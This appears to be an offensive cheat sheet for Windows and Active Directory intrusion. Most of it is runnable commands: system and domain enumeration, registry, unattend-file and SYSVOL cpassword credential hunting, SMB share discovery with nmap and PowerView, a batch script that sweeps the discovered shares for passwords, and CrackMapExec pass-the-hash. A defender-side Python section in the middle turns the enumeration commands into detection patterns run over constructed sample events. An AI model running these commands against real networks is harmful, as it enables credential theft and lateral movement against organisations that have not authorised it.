Windows OS Enumeration
net config Workstation
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
hostname
net users
ipconfig /all
route print
arp -A
netstat -ano
netsh firewall show state
netsh firewall show config
schtasks /query /fo LIST /v
tasklist /SVC
net start
DRIVERQUERY
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
dir /s pass == cred == vnc == .config
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
Find Goodies
Service Account Credentials within SYSVOL Group Policy Preferences (GPP)
findstr /S /I cpassword \\domain.com\sysvol\domain.com\policies\*.xml
Find in files and registry
findstr /snip password *.xml *.ini *.txt (quicker than below)
findstr /snip password *
dir /s *password* == *cred* == *vnc* == *.config*
dir c:\*vnc.ini /s /b
c:\sysprep.inf
c:\sysprep\sysprep.xml
c:\unattend.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
GPO settings
gpresult /z
gpresult /H <FileName> (for pretty HTML output written to the named file)
Users, Groups and Privileges
CMD
net localgroup administrators /domain
net group "Domain Controllers" /domain
net group "Domain Admins" /domain
net group "Enterprise Admins" /domain
net user /domain <UserName>
Powershell
Get-ADDomainController -filter * | select hostname, operatingsystem
Get-ADFineGrainedPasswordPolicy -filter *
Get-ADDefaultDomainPasswordPolicy
Get-ADUser <UserName> -Properties *
Get-ADUser -filter * -properties Name, PasswordNeverExpires | where {$_.passwordNeverExpires -eq "true" } | Select-Object DistinguishedName,Name,Enabled
Get-ADGroupMember -identity <GroupName>
Get-ADComputer -filter * | select name
Get-GPO -all | select DisplayName, gpostatus
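Added defender-side example, not part of the original cheat sheet: the commands in the OS enumeration and Users, Groups and Privileges sections above are turned into detection patterns and run over constructed process-creation records (the shape of Windows Security event 4688: user plus full command line). A single hit is often routine administration, so the script only flags a user who runs several distinct techniques. The sample events, the pattern labels and the threshold are assumptions made for this example.

```python
import re

# Constructed sample process-creation records in the shape of Windows
# Security event 4688 (user and full command line). Made up for this
# example; not taken from any real host.
SAMPLE_EVENTS = [
    {"user": r"CORP\jsmith", "cmdline": r"reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated"},
    {"user": r"CORP\jsmith", "cmdline": r"reg query HKLM /f password /t REG_SZ /s"},
    {"user": r"CORP\jsmith", "cmdline": r'net group "Domain Admins" /domain'},
    {"user": r"CORP\jsmith", "cmdline": r"findstr /S /I cpassword \\corp.local\sysvol\corp.local\policies\*.xml"},
    {"user": r"CORP\svc_backup", "cmdline": r"schtasks /query /fo LIST /v"},
    {"user": r"CORP\helpdesk", "cmdline": r"ipconfig /all"},
]

# One regex per enumeration command from the cheat sheet, matched
# case-insensitively against the recorded command line. Labels are ours.
DISCOVERY_PATTERNS = {
    "installer_always_elevated": r"\breg(?:\.exe)?\s+query\s+.*AlwaysInstallElevated",
    "registry_password_hunt": r"\breg(?:\.exe)?\s+query\s+HK(?:LM|CU)\s+/f\s+password",
    "gpp_cpassword_search": r"\bfindstr\b.*\bcpassword\b.*sysvol",
    "privileged_group_enum": r'\bnet(?:\.exe)?\s+group\s+"(?:Domain Admins|Enterprise Admins|Domain Controllers)"\s+/domain',
    "local_admin_enum": r"\bnet(?:\.exe)?\s+localgroup\s+administrators",
    "scheduled_task_dump": r"\bschtasks\b.*/query\s+/fo\s+LIST\s+/v",
    "firewall_config_read": r"\bnetsh\s+firewall\s+show\s+(?:state|config)",
    "unattend_file_read": r"(?:sysprep|unattend(?:ed)?)\.(?:xml|inf)",
}


def classify(cmdline):
    """Return the labels of every discovery pattern that matches cmdline."""
    return [label for label, pattern in DISCOVERY_PATTERNS.items()
            if re.search(pattern, cmdline, re.IGNORECASE)]


def score_events(events, threshold=3):
    """Collect distinct techniques per user and flag users at or above
    `threshold` distinct techniques (a spread of them in one session is
    the enumeration pattern; one alone is often admin routine)."""
    hits = {}
    for event in events:
        for label in classify(event["cmdline"]):
            hits.setdefault(event["user"], set()).add(label)
    flagged = sorted(user for user, labels in hits.items() if len(labels) >= threshold)
    return hits, flagged


if __name__ == "__main__":
    per_user, flagged = score_events(SAMPLE_EVENTS)
    print({u: sorted(l) for u, l in per_user.items()}, "flag for review:", flagged)
```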
SMB File Shares
Find Hosts with SMB Open (Nmap)
nmap -vv -Pn -n -p 445 10.10.10.0/24 -oA smb_host
Format:
grep open smb_host.gnmap | awk {'print $2'} > smb_up.txt && cat smb_up.txt
Find Open Shares (PowerView)
Invoke-ShareFinder -HostList hosts_with_smb.txt -NoPing -CheckShareAccess | Out-File -Encoding ascii found_shares.txt
If you want to remove the extra formatting of the output in found_shares.txt, you can run (write to a new file first; redirecting straight back into found_shares.txt truncates it before grep reads it):
grep -oP "(\s).?\-.*" found_shares.txt > found_shares_clean.txt && mv found_shares_clean.txt found_shares.txt
Permissions (PowerView)
Invoke-FileFinder -ShareList .\found_shares.txt | ForEach-Object {Get-Acl $_.FullName} | Select-Object -Property Path,Owner,Group,AccessToString | Export-Csv Permissions.csv
Find Interesting file names from Share list (PowerView)
Invoke-FileFinder -ShareList found_shares.txt -Terms confidential, password -Verbose | ForEach-Object {Get-Acl $_.FullName} | Format-List
Batch script to search for in-file passwords in the open shares found in the steps above.
@echo off
REM Reads one UNC share path per line from found_shares.txt, maps it to Z:,
REM and searches every file on it for "password", appending hits to the output file.
for /F "tokens=*" %%a in (found_shares.txt) do (
    C:
    REM Drop any mapping left over from the previous share
    NET USE Z: /delete /y
    net use z: "%%a"
    Z:
    echo %%a
    echo %%a >> "C:\Temp\output_file.txt"
    REM Only search when the mapping succeeded
    if exist z:\ ( findstr /snip password * >> "C:\Temp\output_file.txt" )
)
Use password or hash for authentication (using CrackMapExec)
cme smb 192.168.1.0/24 -u UserName -H 'LM:NT'
cme smb 192.168.1.0/24 -u UserName -p 'PASSWORDHERE'
Lists